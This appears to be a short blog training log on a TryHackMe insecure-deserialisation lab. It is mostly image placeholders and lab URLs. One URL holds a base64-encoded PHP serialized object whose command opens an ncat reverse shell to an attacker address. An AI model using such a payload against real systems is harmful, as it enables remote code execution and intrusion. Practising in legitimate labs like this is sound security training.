Skip to main content

Training Update v0.94

blank
blank

It’s the end of the week, Friday is here and we are back at it again.. on THM!

Today we kick of with the Advanced Server-Side Attacks section of the Web Application Pentesting Pathway.

The first box we are going to tackle today (or atleast attempt to) will be Insecure Deserialisation.

blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank

http://10.10.177.40/who/index.php

blank

http://10.10.177.40/who/index.php~

blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank

10.10.102.51/case2/?decode=TzoxNzoiTWFsaWNpb3VzVXNlckRhdGEiOjE6e3M6NzoiY29tbWFuZCI7czozODoibmNhdCAtbnYgMTAuMTEuMTI1LjE1MCA0NDQ0IC1lIC9iaW4vc2giO30=

blank
blank
blank
blank
blank
blank
blank

http://10.10.102.51:8089/get-key

blank

http://10.10.102.51:8089/

blank
blank
blank
blank
blank
blank
blank
blank
blank
blank

Until next time & don’t sleepwalk through life!

Bless